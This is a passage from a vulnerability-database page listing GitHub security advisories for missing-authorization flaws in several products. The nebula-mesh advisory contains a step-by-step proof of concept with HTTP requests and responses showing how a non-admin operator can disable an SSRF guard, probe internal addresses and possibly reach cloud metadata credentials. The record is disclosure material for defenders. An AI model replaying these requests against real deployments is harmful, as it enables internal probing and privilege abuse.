CWE-862
Allowed-with-ReviewMissing Authorization
Abstraction: Class · Status: Incomplete
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
14544 vulnerabilities reference this CWE, most recent first.
GHSA-7RQ2-RP8G-VMXX
Vulnerability from github – Published: 2025-12-16 09:31 – Updated: 2026-01-20 15:32Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TI WooCommerce Wishlist: from n/a through <= 2.10.0.
{
"affected": [],
"aliases": [
"CVE-2025-67929"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-16T09:15:59Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TI WooCommerce Wishlist: from n/a through \u003c= 2.10.0.",
"id": "GHSA-7rq2-rp8g-vmxx",
"modified": "2026-01-20T15:32:16Z",
"published": "2025-12-16T09:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67929"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/ti-woocommerce-wishlist/vulnerability/wordpress-ti-woocommerce-wishlist-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve"
},
{
"type": "WEB",
"url": "https://vdp.patchstack.com/database/Wordpress/Plugin/ti-woocommerce-wishlist/vulnerability/wordpress-ti-woocommerce-wishlist-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-7RQ6-7GV8-C37H
Vulnerability from github – Published: 2021-11-03 17:30 – Updated: 2021-11-03 14:35Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, LocalRequestsOnlyAuthorizationFilter filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings.
However due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed.
Impact
Missing authorization when default options are used for the Dashboard UI, e.g. when no custom authorization rules are used as recommended in the Using Dashboard documentation article.
Impacted
If you are using UseHangfireDashboard method with default DashboardOptions.Authorization property value, then your installation is impacted:
app.UseHangfireDashboard(); // Impacted
app.UseHangfireDashboard("/hangfire", new DashboardOptions()); // Impacted
Not Impacted
If any other authorization filter is specified in the DashboardOptions.Authorization property, the you are not impacted:
app.UseHangfireDashboard("/hangfire", new DashboardOptions
{
Authorization = new []{ new SomeAuthorizationFilter(); } // Not impacted
});
Patches
Patch is already available in version 1.7.26 and already available on NuGet.org, please see Hangfire.Core 1.7.26. Default authorization rules now prohibit remote requests by default again by including the LocalRequestsOnlyAuthorizationFilter filter to the default settings. Please upgrade to the newest version in order to mitigate the issue.
Workarounds
It is possible to fix the issue by using the LocalRequestsOnlyAuthorizationFilter explicitly when configuring the Dashboard UI. In this case upgrade is not required.
// using Hangfire.Dashboard;
app.UseHangfireDashboard("/hangfire", new DashboardOptions
{
Authorization = new []{ new LocalRequestsOnlyAuthorizationFilter(); }
});
References
Original GitHub Issue: https://github.com/HangfireIO/Hangfire/issues/1958
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Hangfire.Core"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.25"
},
{
"fixed": "1.7.26"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.7.25"
]
}
],
"aliases": [
"CVE-2021-41238"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2021-11-02T19:50:00Z",
"nvd_published_at": "2021-11-02T18:15:00Z",
"severity": "HIGH"
},
"details": "Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, `LocalRequestsOnlyAuthorizationFilter` filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings.\n\nHowever due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed.\n\n### Impact\n\nMissing authorization when default options are used for the Dashboard UI, e.g. when no custom authorization rules are used as recommended in the [Using Dashboard](https://docs.hangfire.io/en/latest/configuration/using-dashboard.html#configuring-authorization) documentation article. \n\n#### Impacted\n\nIf you are using `UseHangfireDashboard` method with default `DashboardOptions.Authorization` property value, then your installation is impacted:\n\n```csharp\napp.UseHangfireDashboard(); // Impacted\napp.UseHangfireDashboard(\"/hangfire\", new DashboardOptions()); // Impacted\n```\n\n#### Not Impacted\n\nIf any other authorization filter is specified in the `DashboardOptions.Authorization` property, the you are not impacted:\n\n```csharp\napp.UseHangfireDashboard(\"/hangfire\", new DashboardOptions\n{\n Authorization = new []{ new SomeAuthorizationFilter(); } // Not impacted\n});\n```\n\n### Patches\n\nPatch is already available in version [1.7.26](https://github.com/HangfireIO/Hangfire/releases/tag/v1.7.26) and already available on NuGet.org, please see [Hangfire.Core 1.7.26](https://www.nuget.org/packages/Hangfire.Core/1.7.26). Default authorization rules now prohibit remote requests by default again by including the `LocalRequestsOnlyAuthorizationFilter` filter to the default settings. Please upgrade to the newest version in order to mitigate the issue.\n\n### Workarounds\n\nIt is possible to fix the issue by using the `LocalRequestsOnlyAuthorizationFilter` explicitly when configuring the Dashboard UI. In this case upgrade is not required.\n\n```csharp\n// using Hangfire.Dashboard;\n\napp.UseHangfireDashboard(\"/hangfire\", new DashboardOptions\n{\n Authorization = new []{ new LocalRequestsOnlyAuthorizationFilter(); }\n});\n```\n\n### References\n\nOriginal GitHub Issue: https://github.com/HangfireIO/Hangfire/issues/1958",
"id": "GHSA-7rq6-7gv8-c37h",
"modified": "2021-11-03T14:35:35Z",
"published": "2021-11-03T17:30:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41238"
},
{
"type": "WEB",
"url": "https://github.com/HangfireIO/Hangfire/issues/1958"
},
{
"type": "PACKAGE",
"url": "https://github.com/HangfireIO/Hangfire"
},
{
"type": "WEB",
"url": "https://www.nuget.org/packages/Hangfire.Core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Missing Authorization with Default Settings in Dashboard UI"
}
GHSA-7RQ7-96M7-QR44
Vulnerability from github – Published: 2024-04-16 21:31 – Updated: 2026-04-28 21:34Missing Authorization vulnerability in Very Good Plugins Fatal Error Notify.This issue affects Fatal Error Notify: from n/a through 1.5.2.
{
"affected": [],
"aliases": [
"CVE-2024-32455"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-16T19:15:07Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Very Good Plugins Fatal Error Notify.This issue affects Fatal Error Notify: from n/a through 1.5.2.",
"id": "GHSA-7rq7-96m7-qr44",
"modified": "2026-04-28T21:34:44Z",
"published": "2024-04-16T21:31:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32455"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/fatal-error-notify/wordpress-fatal-error-notify-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7RQW-6HGH-FHRG
Vulnerability from github – Published: 2024-11-01 15:31 – Updated: 2024-11-01 15:31Missing Authorization vulnerability in PickPlugins Product Designer allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Product Designer: from n/a through 1.0.33.
{
"affected": [],
"aliases": [
"CVE-2024-38726"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-01T15:15:32Z",
"severity": "HIGH"
},
"details": "Missing Authorization vulnerability in PickPlugins Product Designer allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Product Designer: from n/a through 1.0.33.",
"id": "GHSA-7rqw-6hgh-fhrg",
"modified": "2024-11-01T15:31:58Z",
"published": "2024-11-01T15:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38726"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/product-designer/wordpress-product-designer-plugin-1-0-33-arbitrary-content-deletion-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7RRJ-WJM7-PQG4
Vulnerability from github – Published: 2025-08-12 06:34 – Updated: 2025-08-12 06:34The UiCore Elements – Free Elementor widgets and templates plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.3.0 via the prepare_template() function due to a missing capability check and insufficient controls on the filename specified. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
{
"affected": [],
"aliases": [
"CVE-2025-6253"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-12T06:15:26Z",
"severity": "HIGH"
},
"details": "The UiCore Elements \u2013 Free Elementor widgets and templates plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.3.0 via the prepare_template() function due to a missing capability check and insufficient controls on the filename specified. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.",
"id": "GHSA-7rrj-wjm7-pqg4",
"modified": "2025-08-12T06:34:24Z",
"published": "2025-08-12T06:34:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6253"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3314574/uicore-elements#file3"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7cd6e44-bd78-4eb8-bab8-09e2af583222?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7RVM-47HF-M85C
Vulnerability from github – Published: 2025-11-26 18:31 – Updated: 2025-12-03 21:31Ruoyi v4.8.0 vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the resetPwd Method of SysUserController.java.
{
"affected": [],
"aliases": [
"CVE-2025-46174"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-26T16:15:47Z",
"severity": "HIGH"
},
"details": "Ruoyi v4.8.0 vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the resetPwd Method of SysUserController.java.",
"id": "GHSA-7rvm-47hf-m85c",
"modified": "2025-12-03T21:31:01Z",
"published": "2025-11-26T18:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46174"
},
{
"type": "WEB",
"url": "https://gist.github.com/Han-tj/29543ce0dae8cbb3bcbedca3390844a9"
},
{
"type": "WEB",
"url": "https://gitee.com/y_project/RuoYi/commit/ea4af7a8cf54393b11d3d286e0aaeb3df8a9aaef"
},
{
"type": "WEB",
"url": "https://gitee.com/y_project/RuoYi/issues/IC1JZR"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7RW2-4F63-2RGV
Vulnerability from github – Published: 2024-06-11 18:30 – Updated: 2024-06-11 18:30Missing Authorization vulnerability in Podlove Podlove Podcast Publisher.This issue affects Podlove Podcast Publisher: from n/a through 4.1.0.
{
"affected": [],
"aliases": [
"CVE-2024-32143"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-11T17:16:00Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Podlove Podlove Podcast Publisher.This issue affects Podlove Podcast Publisher: from n/a through 4.1.0.",
"id": "GHSA-7rw2-4f63-2rgv",
"modified": "2024-06-11T18:30:49Z",
"published": "2024-06-11T18:30:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32143"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/podlove-podcasting-plugin-for-wordpress/wordpress-podlove-podcast-publisher-plugin-4-1-0-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7RW5-9G4X-GF48
Vulnerability from github – Published: 2025-07-25 15:30 – Updated: 2025-07-25 15:30The ONLYOFFICE Docs plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its oo.callback REST endpoint in versions 1.1.0 to 2.2.0. The plugin’s permission callback only verifies that the supplied, encrypted attachment ID maps to an existing attachment post, but does not verify the requester’s identity or capabilities. This makes it possible for unauthenticated attackers to log in as an arbitrary user.
{
"affected": [],
"aliases": [
"CVE-2025-6380"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-24T10:15:26Z",
"severity": "CRITICAL"
},
"details": "The ONLYOFFICE Docs plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its oo.callback REST endpoint in versions 1.1.0 to 2.2.0. The plugin\u2019s permission callback only verifies that the supplied, encrypted attachment ID maps to an existing attachment post, but does not verify the requester\u2019s identity or capabilities. This makes it possible for unauthenticated attackers to log in as an arbitrary user.",
"id": "GHSA-7rw5-9g4x-gf48",
"modified": "2025-07-25T15:30:43Z",
"published": "2025-07-25T15:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6380"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/onlyoffice/tags/2.2.0/public/class-onlyoffice-plugin-public.php#L111"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/onlyoffice/tags/2.2.0/public/views/class-onlyoffice-plugin-callback.php#L57"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/onlyoffice/#developers"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/608b0506-074b-4df3-8c30-57cfb090f553?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7RX3-5WX3-5V76
Vulnerability from github – Published: 2026-07-14 20:28 – Updated: 2026-07-14 20:28Summary
Non-admin operators (role user) can set allow_private: true on their own managed webhook subscription (POST/PATCH /api/v1/webhook-subscriptions). No admin check exists on this field. At delivery time, allow_private switches the dispatcher to an unguarded HTTP client, bypassing the private/loopback/link-local SSRF guard — letting a low-privilege operator make the server request internal addresses.
Details
internal/api/webhooks.go:67 (handleCreateWebhookSubscription) and :110 (handleUpdateWebhookSubscription) persist operator-supplied AllowPrivate with no role check — only ownership is enforced (canAccessWebhookSub), and that's not even called on create.
internal/webhook/webhook.go:294-296:
client := d.guarded
if tgt.AllowPrivate {
client = d.unguarded
}
d.unguarded skips the loopback/private/link-local rejection config.ValidateWebhookURL otherwise enforces.
Every other tenant-impacting toggle (network create internal/api/networks.go:21, settings PATCH internal/api/settings.go:36, CA management) gates on isActiveAdmin. allow_private is the exception — introduced with managed webhook subscriptions (PR #258) and missed by the two prior fixes for the same authz-gap class in this repo (GHSA-598g-h2vc-h5vg, GHSA-c6v2-3ffm-vcmc).
PoC
Verified live against a real running instance of nebula-mesh (HEAD 2c3457c, built and run locally, no third-party requests made — the "internal service" below is a loopback listener standing in for one). Setup: nebula-mgmt init + serve on 127.0.0.1:8181; admin CLI creates operator lowpriv with -role user and mints it an API key (d984bb...c7c) — the routine, legitimate way any non-admin operator gets access. lowpriv self-mints its own CA (POST /api/v1/cas, allowed for any operator) and creates a host on a network scoped to that CA, so it owns something it can legitimately act on.
Step 1 — create-side bypass, as the non-admin lowpriv operator:
POST /api/v1/webhook-subscriptions HTTP/1.1
Authorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c
Content-Type: application/json
{"url":"http://127.0.0.1:9999/internal-admin","allow_private":true,"events":["host.enrolled"]}
Actual response:
HTTP/1.1 201 Created
{"id":"bcad45e0-acc5-47ac-bb48-c4fc66959e50","owner_operator_id":"a4ec02d3-c7ae-412d-a2ff-567d36315191","url":"http://127.0.0.1:9999/internal-admin","events":["host.enrolled"],"active":true,"allow_private":true,"has_secret":false,"consecutive_failures":0,"created_at":"2026-07-01T13:38:22.637847+07:00","updated_at":"2026-07-01T13:38:22.637847+07:00"}
201 Created, allow_private:true persisted, owner_operator_id is the non-admin lowpriv account (role: "user"). No 403 Forbidden — which is what every comparable admin-gated endpoint (POST /api/v1/networks, PATCH /api/v1/settings) returns for this same non-admin key.
Control — same non-admin key, same target, allow_private omitted (defaults false):
POST /api/v1/webhook-subscriptions HTTP/1.1
Authorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c
Content-Type: application/json
{"url":"http://127.0.0.1:9999/internal-admin","allow_private":false}
HTTP/1.1 400 Bad Request
{"error":"url: \"127.0.0.1\" is a private/loopback/link-local address; allow it explicitly only for an intentional internal sink"}
Confirms the guard is real and active for this exact target — allow_private:true in Step 1 is what disabled it.
Step 2 — delivery-side SSRF. A Python http.server listener bound 127.0.0.1:9999, logging every request it receives. lowpriv fires a host-lifecycle event on the host it owns:
POST /api/v1/hosts/48103bac-66e9-43bd-9211-8d574e0877e9/unblock HTTP/1.1
Authorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c
POST /api/v1/hosts/48103bac-66e9-43bd-9211-8d574e0877e9/block HTTP/1.1
Authorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c
Both returned 200 OK. The listener received, in real time, two outbound POSTs from the nebula-mesh server itself:
RECEIVED: /internal-admin {"id":"evt_99c1902b-78f1-4e71-bd3d-a5586172c1e6","type":"host.unblocked","created_at":"2026-07-01T06:42:11.5305Z","data":{"ca_id":"74cb77b9-2adf-499c-b1d6-707b49486a7e","host_id":"48103bac-66e9-43bd-9211-8d574e0877e9","host_name":"poc-host","network_id":"eacf739f-f57d-4cbc-b391-2a0996c72b98"}}
RECEIVED: /internal-admin {"id":"evt_7e411cf3-8fc0-4816-a7fe-52b623feef1c","type":"host.blocked","created_at":"2026-07-01T06:42:11.543246Z","data":{"ca_id":"74cb77b9-2adf-499c-b1d6-707b49486a7e","host_id":"48103bac-66e9-43bd-9211-8d574e0877e9","host_name":"poc-host","network_id":"eacf739f-f57d-4cbc-b391-2a0996c72b98"}}
Same result holds for host.enrolled — any lifecycle event the operator can cause on a resource they own routes through the same dispatcher code path.
Step 3 — reachability oracle:
GET /api/v1/webhook-subscriptions/bcad45e0-acc5-47ac-bb48-c4fc66959e50 HTTP/1.1
Authorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c
HTTP/1.1 200 OK
{"id":"bcad45e0-acc5-47ac-bb48-c4fc66959e50", ... ,"last_delivery_at":"2026-07-01T13:42:11.544244+07:00","last_status":"ok","consecutive_failures":0, ...}
last_status/last_error confirm delivery outcome and, on failure, the dial/connection error string — a reachability oracle over internal addresses. The dispatcher's delivery-recording path stores success/failure and error text only, never the target's response body.
Impact
A non-admin operator gains server-side request capability against internal-only/loopback addresses, outside the admin boundary the codebase enforces everywhere else. Enables internal reachability probing and blind POST interaction with internal services. May expose cloud IAM credentials on deployments where the metadata service accepts unauthenticated/IMDSv1-style requests — conditional on target config, not guaranteed (IMDSv2's token requirement would block it).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.7.1"
},
"package": {
"ecosystem": "Go",
"name": "github.com/forgekeep/nebula-mesh"
},
"ranges": [
{
"events": [
{
"introduced": "0.6.0"
},
{
"fixed": "0.7.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-862",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-14T20:28:42Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nNon-admin operators (role `user`) can set `allow_private: true` on their own managed webhook subscription (`POST`/`PATCH /api/v1/webhook-subscriptions`). No admin check exists on this field. At delivery time, `allow_private` switches the dispatcher to an unguarded HTTP client, bypassing the private/loopback/link-local SSRF guard \u2014 letting a low-privilege operator make the server request internal addresses.\n\n### Details\n\n`internal/api/webhooks.go:67` (`handleCreateWebhookSubscription`) and `:110` (`handleUpdateWebhookSubscription`) persist operator-supplied `AllowPrivate` with no role check \u2014 only ownership is enforced (`canAccessWebhookSub`), and that\u0027s not even called on create.\n\n`internal/webhook/webhook.go:294-296`:\n```go\nclient := d.guarded\nif tgt.AllowPrivate {\n client = d.unguarded\n}\n```\n`d.unguarded` skips the loopback/private/link-local rejection `config.ValidateWebhookURL` otherwise enforces.\n\nEvery other tenant-impacting toggle (network create `internal/api/networks.go:21`, settings PATCH `internal/api/settings.go:36`, CA management) gates on `isActiveAdmin`. `allow_private` is the exception \u2014 introduced with managed webhook subscriptions (PR #258) and missed by the two prior fixes for the same authz-gap class in this repo (GHSA-598g-h2vc-h5vg, GHSA-c6v2-3ffm-vcmc).\n\n### PoC\n\nVerified live against a real running instance of nebula-mesh (HEAD `2c3457c`, built and run locally, no third-party requests made \u2014 the \"internal service\" below is a loopback listener standing in for one). Setup: `nebula-mgmt init` + `serve` on `127.0.0.1:8181`; admin CLI creates operator `lowpriv` with `-role user` and mints it an API key (`d984bb...c7c`) \u2014 the routine, legitimate way any non-admin operator gets access. `lowpriv` self-mints its own CA (`POST /api/v1/cas`, allowed for any operator) and creates a host on a network scoped to that CA, so it owns something it can legitimately act on.\n\n**Step 1 \u2014 create-side bypass, as the non-admin `lowpriv` operator:**\n\n```\nPOST /api/v1/webhook-subscriptions HTTP/1.1\nAuthorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c\nContent-Type: application/json\n\n{\"url\":\"http://127.0.0.1:9999/internal-admin\",\"allow_private\":true,\"events\":[\"host.enrolled\"]}\n```\n\nActual response:\n\n```\nHTTP/1.1 201 Created\n\n{\"id\":\"bcad45e0-acc5-47ac-bb48-c4fc66959e50\",\"owner_operator_id\":\"a4ec02d3-c7ae-412d-a2ff-567d36315191\",\"url\":\"http://127.0.0.1:9999/internal-admin\",\"events\":[\"host.enrolled\"],\"active\":true,\"allow_private\":true,\"has_secret\":false,\"consecutive_failures\":0,\"created_at\":\"2026-07-01T13:38:22.637847+07:00\",\"updated_at\":\"2026-07-01T13:38:22.637847+07:00\"}\n```\n\n`201 Created`, `allow_private:true` persisted, `owner_operator_id` is the non-admin `lowpriv` account (`role: \"user\"`). No `403 Forbidden` \u2014 which is what every comparable admin-gated endpoint (`POST /api/v1/networks`, `PATCH /api/v1/settings`) returns for this same non-admin key.\n\n**Control \u2014 same non-admin key, same target, `allow_private` omitted (defaults false):**\n\n```\nPOST /api/v1/webhook-subscriptions HTTP/1.1\nAuthorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c\nContent-Type: application/json\n\n{\"url\":\"http://127.0.0.1:9999/internal-admin\",\"allow_private\":false}\n```\n\n```\nHTTP/1.1 400 Bad Request\n\n{\"error\":\"url: \\\"127.0.0.1\\\" is a private/loopback/link-local address; allow it explicitly only for an intentional internal sink\"}\n```\n\nConfirms the guard is real and active for this exact target \u2014 `allow_private:true` in Step 1 is what disabled it.\n\n**Step 2 \u2014 delivery-side SSRF.** A Python `http.server` listener bound `127.0.0.1:9999`, logging every request it receives. `lowpriv` fires a host-lifecycle event on the host it owns:\n\n```\nPOST /api/v1/hosts/48103bac-66e9-43bd-9211-8d574e0877e9/unblock HTTP/1.1\nAuthorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c\n```\n```\nPOST /api/v1/hosts/48103bac-66e9-43bd-9211-8d574e0877e9/block HTTP/1.1\nAuthorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c\n```\n\nBoth returned `200 OK`. The listener received, in real time, two outbound POSTs from the nebula-mesh server itself:\n\n```\nRECEIVED: /internal-admin {\"id\":\"evt_99c1902b-78f1-4e71-bd3d-a5586172c1e6\",\"type\":\"host.unblocked\",\"created_at\":\"2026-07-01T06:42:11.5305Z\",\"data\":{\"ca_id\":\"74cb77b9-2adf-499c-b1d6-707b49486a7e\",\"host_id\":\"48103bac-66e9-43bd-9211-8d574e0877e9\",\"host_name\":\"poc-host\",\"network_id\":\"eacf739f-f57d-4cbc-b391-2a0996c72b98\"}}\nRECEIVED: /internal-admin {\"id\":\"evt_7e411cf3-8fc0-4816-a7fe-52b623feef1c\",\"type\":\"host.blocked\",\"created_at\":\"2026-07-01T06:42:11.543246Z\",\"data\":{\"ca_id\":\"74cb77b9-2adf-499c-b1d6-707b49486a7e\",\"host_id\":\"48103bac-66e9-43bd-9211-8d574e0877e9\",\"host_name\":\"poc-host\",\"network_id\":\"eacf739f-f57d-4cbc-b391-2a0996c72b98\"}}\n```\n\nSame result holds for `host.enrolled` \u2014 any lifecycle event the operator can cause on a resource they own routes through the same dispatcher code path.\n\n**Step 3 \u2014 reachability oracle:**\n\n```\nGET /api/v1/webhook-subscriptions/bcad45e0-acc5-47ac-bb48-c4fc66959e50 HTTP/1.1\nAuthorization: Bearer d984bbe6680a9b3f57def0caf8556466e502d35c8c287bd2f1fd6938fcda2e7c\n```\n\n```\nHTTP/1.1 200 OK\n\n{\"id\":\"bcad45e0-acc5-47ac-bb48-c4fc66959e50\", ... ,\"last_delivery_at\":\"2026-07-01T13:42:11.544244+07:00\",\"last_status\":\"ok\",\"consecutive_failures\":0, ...}\n```\n\n`last_status`/`last_error` confirm delivery outcome and, on failure, the dial/connection error string \u2014 a reachability oracle over internal addresses. The dispatcher\u0027s delivery-recording path stores success/failure and error text only, never the target\u0027s response body.\n\n### Impact\n\nA non-admin operator gains server-side request capability against internal-only/loopback addresses, outside the admin boundary the codebase enforces everywhere else. Enables internal reachability probing and blind POST interaction with internal services. May expose cloud IAM credentials on deployments where the metadata service accepts unauthenticated/IMDSv1-style requests \u2014 conditional on target config, not guaranteed (IMDSv2\u0027s token requirement would block it).",
"id": "GHSA-7rx3-5wx3-5v76",
"modified": "2026-07-14T20:28:42Z",
"published": "2026-07-14T20:28:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/forgekeep/nebula-mesh/security/advisories/GHSA-7rx3-5wx3-5v76"
},
{
"type": "WEB",
"url": "https://github.com/forgekeep/nebula-mesh/commit/f3c54530e388dd21763e548923426e60a8e93ff0"
},
{
"type": "PACKAGE",
"url": "https://github.com/forgekeep/nebula-mesh"
},
{
"type": "WEB",
"url": "https://github.com/forgekeep/nebula-mesh/releases/tag/v0.7.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Nebula-mesh allows non-admin operators to disable webhook SSRF protection via `allow_private`"
}
GHSA-7RX6-4VWV-432G
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2023-10-27 14:26Jenkins CloudBees CD Plugin does not perform a permission check in an HTTP endpoint.
This allows attackers with Item/Read permission to schedule builds of projects without having Item/Build permission.
Jenkins CloudBees CD Plugin requires Item/Build permission to schedule builds via its HTTP endpoint.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:electricflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.18.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:electricflow"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.19"
},
{
"fixed": "1.1.22"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-21647"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-13T19:28:45Z",
"nvd_published_at": "2021-04-21T15:15:00Z",
"severity": "MODERATE"
},
"details": "Jenkins CloudBees CD Plugin does not perform a permission check in an HTTP endpoint.\n\nThis allows attackers with Item/Read permission to schedule builds of projects without having Item/Build permission.\n\nJenkins CloudBees CD Plugin requires Item/Build permission to schedule builds via its HTTP endpoint.",
"id": "GHSA-7rx6-4vwv-432g",
"modified": "2023-10-27T14:26:45Z",
